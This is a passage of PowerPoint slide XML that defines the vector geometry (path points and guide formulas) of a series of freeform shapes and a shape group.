            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5077" y="2215"/>
                <a:ext cx="61" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 241"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 241 h 241"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 121 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 449"/>
                  <a:gd name="T7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9" h="241">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="121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2" name="Freeform 766"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5011" y="2115"/>
                <a:ext cx="62" cy="150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 449 w 449"/>
                  <a:gd name="T1" fmla="*/ 981 h 1099"/>
                  <a:gd name="T2" fmla="*/ 449 w 449"/>
                  <a:gd name="T3" fmla="*/ 0 h 1099"/>
                  <a:gd name="T4" fmla="*/ 0 w 449"/>
                  <a:gd name="T5" fmla="*/ 118 h 1099"/>
                  <a:gd name="T6" fmla="*/ 0 w 449"/>
                  <a:gd name="T7" fmla="*/ 1099 h 1099"/>
                  <a:gd name="T8" fmla="*/ 449 w 449"/>
                  <a:gd name="T9" fmla="*/ 981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1099">
                    <a:moveTo>
                      <a:pt x="449" y="981"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1099"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="98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3" name="Freeform 767"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5012" y="2199"/>
                <a:ext cx="61" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 487"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 487 h 487"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 369 h 487"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 487"/>
                  <a:gd name="T8" fmla="*/ 0 w 446"/>
                  <a:gd name="T9" fmla="*/ 0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6" h="487">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="12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4" name="Freeform 768"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4560" y="2090"/>
                <a:ext cx="135" cy="173"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 982"/>
                  <a:gd name="T1" fmla="*/ 1011 h 1268"/>
                  <a:gd name="T2" fmla="*/ 0 w 982"/>
                  <a:gd name="T3" fmla="*/ 0 h 1268"/>
                  <a:gd name="T4" fmla="*/ 982 w 982"/>
                  <a:gd name="T5" fmla="*/ 257 h 1268"/>
                  <a:gd name="T6" fmla="*/ 982 w 982"/>
                  <a:gd name="T7" fmla="*/ 1268 h 1268"/>
                  <a:gd name="T8" fmla="*/ 0 w 982"/>
                  <a:gd name="T9" fmla="*/ 1011 h 1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2" h="1268">
                    <a:moveTo>
                      <a:pt x="0" y="1011"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="1268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="101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5" name="Freeform 769"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4564" y="2095"/>
                <a:ext cx="61" cy="151"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 980 h 1099"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 0 h 1099"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 118 h 1099"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 1099 h 1099"/>
                  <a:gd name="T8" fmla="*/ 0 w 449"/>
                  <a:gd name="T9" fmla="*/ 980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1099">
                    <a:moveTo>
                      <a:pt x="0" y="980"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="1099"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="98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6" name="Freeform 770"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4564" y="2213"/>
                <a:ext cx="61" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 446 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 241"/>
                  <a:gd name="T2" fmla="*/ 446 w 446"/>
                  <a:gd name="T3" fmla="*/ 241 h 241"/>
                  <a:gd name="T4" fmla="*/ 0 w 446"/>
                  <a:gd name="T5" fmla="*/ 120 h 241"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7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6" h="241">
                    <a:moveTo>
                      <a:pt x="446" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="446" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44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7" name="Freeform 771"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4629" y="2112"/>
                <a:ext cx="62" cy="150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 451"/>
                  <a:gd name="T1" fmla="*/ 978 h 1096"/>
                  <a:gd name="T2" fmla="*/ 0 w 451"/>
                  <a:gd name="T3" fmla="*/ 0 h 1096"/>
                  <a:gd name="T4" fmla="*/ 451 w 451"/>
                  <a:gd name="T5" fmla="*/ 118 h 1096"/>
                  <a:gd name="T6" fmla="*/ 451 w 451"/>
                  <a:gd name="T7" fmla="*/ 1096 h 1096"/>
                  <a:gd name="T8" fmla="*/ 0 w 451"/>
                  <a:gd name="T9" fmla="*/ 978 h 10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1" h="1096">
                    <a:moveTo>
                      <a:pt x="0" y="978"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="97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8" name="Freeform 772"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4629" y="2196"/>
                <a:ext cx="62" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 449 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 487"/>
                  <a:gd name="T2" fmla="*/ 449 w 449"/>
                  <a:gd name="T3" fmla="*/ 487 h 487"/>
                  <a:gd name="T4" fmla="*/ 0 w 449"/>
                  <a:gd name="T5" fmla="*/ 366 h 487"/>
                  <a:gd name="T6" fmla="*/ 0 w 449"/>
                  <a:gd name="T7" fmla="*/ 121 h 487"/>
                  <a:gd name="T8" fmla="*/ 449 w 449"/>
                  <a:gd name="T9" fmla="*/ 0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487">
                    <a:moveTo>
                      <a:pt x="449" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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9" name="Freeform 773"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4856" y="1699"/>
                <a:ext cx="429" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3135"/>
                  <a:gd name="T1" fmla="*/ 2038 h 2038"/>
                  <a:gd name="T2" fmla="*/ 0 w 3135"/>
                  <a:gd name="T3" fmla="*/ 838 h 2038"/>
                  <a:gd name="T4" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T5" fmla="*/ 0 h 2038"/>
                  <a:gd name="T6" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T7" fmla="*/ 1200 h 2038"/>
                  <a:gd name="T8" fmla="*/ 0 w 3135"/>
                  <a:gd name="T9" fmla="*/ 2038 h 2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35" h="2038">
                    <a:moveTo>
                      <a:pt x="0" y="2038"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="1200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="203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0" name="Freeform 774"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4429" y="1700"/>
                <a:ext cx="427" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3122"/>
                  <a:gd name="T1" fmla="*/ 1197 h 2033"/>
                  <a:gd name="T2" fmla="*/ 0 w 3122"/>
                  <a:gd name="T3" fmla="*/ 0 h 2033"/>
                  <a:gd name="T4" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T5" fmla="*/ 833 h 2033"/>
                  <a:gd name="T6" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T7" fmla="*/ 2033 h 2033"/>
                  <a:gd name="T8" fmla="*/ 0 w 3122"/>
                  <a:gd name="T9" fmla="*/ 1197 h 20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22" h="2033">
                    <a:moveTo>
                      <a:pt x="0" y="1197"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="833"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="2033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="119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1" name="Freeform 775"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4856" y="1535"/>
                <a:ext cx="429" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3135"/>
                  <a:gd name="T1" fmla="*/ 2038 h 2038"/>
                  <a:gd name="T2" fmla="*/ 0 w 3135"/>
                  <a:gd name="T3" fmla="*/ 839 h 2038"/>
                  <a:gd name="T4" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T5" fmla="*/ 0 h 2038"/>
                  <a:gd name="T6" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T7" fmla="*/ 1200 h 2038"/>
                  <a:gd name="T8" fmla="*/ 0 w 3135"/>
                  <a:gd name="T9" fmla="*/ 2038 h 2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35" h="2038">
                    <a:moveTo>
                      <a:pt x="0" y="2038"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="1200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="203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2" name="Freeform 776"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4429" y="1536"/>
                <a:ext cx="427" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3122"/>
                  <a:gd name="T1" fmla="*/ 1200 h 2033"/>
                  <a:gd name="T2" fmla="*/ 0 w 3122"/>
                  <a:gd name="T3" fmla="*/ 0 h 2033"/>
                  <a:gd name="T4" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T5" fmla="*/ 834 h 2033"/>
                  <a:gd name="T6" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T7" fmla="*/ 2033 h 2033"/>
                  <a:gd name="T8" fmla="*/ 0 w 3122"/>
                  <a:gd name="T9" fmla="*/ 1200 h 20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22" h="2033">
                    <a:moveTo>
                      <a:pt x="0" y="1200"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="2033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="120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3" name="Freeform 777"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4856" y="1371"/>
                <a:ext cx="429" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3135"/>
                  <a:gd name="T1" fmla="*/ 2037 h 2037"/>
                  <a:gd name="T2" fmla="*/ 0 w 3135"/>
                  <a:gd name="T3" fmla="*/ 839 h 2037"/>
                  <a:gd name="T4" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T5" fmla="*/ 0 h 2037"/>
                  <a:gd name="T6" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T7" fmla="*/ 1198 h 2037"/>
                  <a:gd name="T8" fmla="*/ 0 w 3135"/>
                  <a:gd name="T9" fmla="*/ 2037 h 20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35" h="2037">
                    <a:moveTo>
                      <a:pt x="0" y="2037"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="1198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="203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4" name="Freeform 778"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4429" y="1371"/>
                <a:ext cx="427" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3122"/>
                  <a:gd name="T1" fmla="*/ 1203 h 2037"/>
                  <a:gd name="T2" fmla="*/ 0 w 3122"/>
                  <a:gd name="T3" fmla="*/ 0 h 2037"/>
                  <a:gd name="T4" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T5" fmla="*/ 839 h 2037"/>
                  <a:gd name="T6" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T7" fmla="*/ 2037 h 2037"/>
                  <a:gd name="T8" fmla="*/ 0 w 3122"/>
                  <a:gd name="T9" fmla="*/ 1203 h 20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22" h="2037">
                    <a:moveTo>
                      <a:pt x="0" y="1203"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="2037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="120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5" name="Freeform 779"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4856" y="1864"/>
                <a:ext cx="429" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3135"/>
                  <a:gd name="T1" fmla="*/ 2036 h 2036"/>
                  <a:gd name="T2" fmla="*/ 0 w 3135"/>
                  <a:gd name="T3" fmla="*/ 838 h 2036"/>
                  <a:gd name="T4" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T5" fmla="*/ 0 h 2036"/>
                  <a:gd name="T6" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T7" fmla="*/ 1197 h 2036"/>
                  <a:gd name="T8" fmla="*/ 0 w 3135"/>
                  <a:gd name="T9" fmla="*/ 2036 h 20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35" h="2036">
                    <a:moveTo>
                      <a:pt x="0" y="2036"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="1197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="203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6" name="Freeform 780"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4429" y="1864"/>
                <a:ext cx="427" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3122"/>
                  <a:gd name="T1" fmla="*/ 1200 h 2034"/>
                  <a:gd name="T2" fmla="*/ 0 w 3122"/>
                  <a:gd name="T3" fmla="*/ 0 h 2034"/>
                  <a:gd name="T4" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T5" fmla="*/ 836 h 2034"/>
                  <a:gd name="T6" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T7" fmla="*/ 2034 h 2034"/>
                  <a:gd name="T8" fmla="*/ 0 w 3122"/>
                  <a:gd name="T9" fmla="*/ 1200 h 20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22" h="2034">
                    <a:moveTo>
                      <a:pt x="0" y="1200"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="2034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="120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7" name="Freeform 781"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4429" y="1371"/>
                <a:ext cx="11" cy="823"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 78"/>
                  <a:gd name="T1" fmla="*/ 6014 h 6014"/>
                  <a:gd name="T2" fmla="*/ 78 w 78"/>
                  <a:gd name="T3" fmla="*/ 17 h 6014"/>
                  <a:gd name="T4" fmla="*/ 0 w 78"/>
                  <a:gd name="T5" fmla="*/ 0 h 6014"/>
                  <a:gd name="T6" fmla="*/ 0 w 78"/>
                  <a:gd name="T7" fmla="*/ 5998 h 6014"/>
                  <a:gd name="T8" fmla="*/ 78 w 78"/>
                  <a:gd name="T9" fmla="*/ 6014 h 60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6014">
                    <a:moveTo>
                      <a:pt x="78" y="6014"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="60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8" name="Freeform 782"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4845" y="1484"/>
                <a:ext cx="11" cy="823"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 80 w 80"/>
                  <a:gd name="T1" fmla="*/ 6014 h 6014"/>
                  <a:gd name="T2" fmla="*/ 80 w 80"/>
                  <a:gd name="T3" fmla="*/ 17 h 6014"/>
                  <a:gd name="T4" fmla="*/ 0 w 80"/>
                  <a:gd name="T5" fmla="*/ 0 h 6014"/>
                  <a:gd name="T6" fmla="*/ 0 w 80"/>
                  <a:gd name="T7" fmla="*/ 5998 h 6014"/>
                  <a:gd name="T8" fmla="*/ 80 w 80"/>
                  <a:gd name="T9" fmla="*/ 6014 h 60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6014">
                    <a:moveTo>
                      <a:pt x="80" y="6014"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="60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9" name="Freeform 783"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5272" y="1371"/>
                <a:ext cx="11" cy="823"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 78"/>
                  <a:gd name="T1" fmla="*/ 6014 h 6014"/>
                  <a:gd name="T2" fmla="*/ 0 w 78"/>
                  <a:gd name="T3" fmla="*/ 17 h 6014"/>
                  <a:gd name="T4" fmla="*/ 78 w 78"/>
                  <a:gd name="T5" fmla="*/ 0 h 6014"/>
                  <a:gd name="T6" fmla="*/ 78 w 78"/>
                  <a:gd name="T7" fmla="*/ 5998 h 6014"/>
                  <a:gd name="T8" fmla="*/ 0 w 78"/>
                  <a:gd name="T9" fmla="*/ 6014 h 60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6014">
                    <a:moveTo>
                      <a:pt x="0" y="6014"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="5998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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0" name="Freeform 784"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4856" y="1484"/>
                <a:ext cx="11" cy="823"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 78"/>
                  <a:gd name="T1" fmla="*/ 6014 h 6014"/>
                  <a:gd name="T2" fmla="*/ 0 w 78"/>
                  <a:gd name="T3" fmla="*/ 17 h 6014"/>
                  <a:gd name="T4" fmla="*/ 78 w 78"/>
                  <a:gd name="T5" fmla="*/ 0 h 6014"/>
                  <a:gd name="T6" fmla="*/ 78 w 78"/>
                  <a:gd name="T7" fmla="*/ 5998 h 6014"/>
                  <a:gd name="T8" fmla="*/ 0 w 78"/>
                  <a:gd name="T9" fmla="*/ 6014 h 60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6014">
                    <a:moveTo>
                      <a:pt x="0" y="6014"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="5998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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1" name="Freeform 785"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5068" y="1426"/>
                <a:ext cx="11" cy="659"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 78"/>
                  <a:gd name="T1" fmla="*/ 4816 h 4816"/>
                  <a:gd name="T2" fmla="*/ 0 w 78"/>
                  <a:gd name="T3" fmla="*/ 21 h 4816"/>
                  <a:gd name="T4" fmla="*/ 78 w 78"/>
                  <a:gd name="T5" fmla="*/ 0 h 4816"/>
                  <a:gd name="T6" fmla="*/ 78 w 78"/>
                  <a:gd name="T7" fmla="*/ 4797 h 4816"/>
                  <a:gd name="T8" fmla="*/ 0 w 78"/>
                  <a:gd name="T9" fmla="*/ 4816 h 48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4816">
                    <a:moveTo>
                      <a:pt x="0" y="4816"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="4797"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="481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2" name="Freeform 786"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4622" y="1423"/>
                <a:ext cx="11" cy="660"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 80 w 80"/>
                  <a:gd name="T1" fmla="*/ 4816 h 4816"/>
                  <a:gd name="T2" fmla="*/ 80 w 80"/>
                  <a:gd name="T3" fmla="*/ 21 h 4816"/>
                  <a:gd name="T4" fmla="*/ 0 w 80"/>
                  <a:gd name="T5" fmla="*/ 0 h 4816"/>
                  <a:gd name="T6" fmla="*/ 0 w 80"/>
                  <a:gd name="T7" fmla="*/ 4797 h 4816"/>
                  <a:gd name="T8" fmla="*/ 80 w 80"/>
                  <a:gd name="T9" fmla="*/ 4816 h 48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4816">
                    <a:moveTo>
                      <a:pt x="80" y="4816"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4797"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="481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913" name="Group 935"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4650870" y="3614404"/>
              <a:ext cx="163956" cy="394244"/>
              <a:chOff x="3736" y="1032"/>
              <a:chExt cx="266" cy="635"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="914" name="Freeform 936"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3803" y="1338"/>
                <a:ext cx="121" cy="329"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 90"/>
                  <a:gd name="T1" fmla="*/ 156 h 245"/>
                  <a:gd name="T2" fmla="*/ 90 w 90"/>
                  <a:gd name="T3" fmla="*/ 7 h 245"/>
                  <a:gd name="T4" fmla="*/ 89 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 245"/>
                  <a:gd name="T6" fmla="*/ 63 w 90"/>
                  <a:gd name="T7" fmla="*/ 20 h 245"/>
                  <a:gd name="T8" fmla="*/ 12 w 90"/>
                  <a:gd name="T9" fmla="*/ 10 h 245"/>
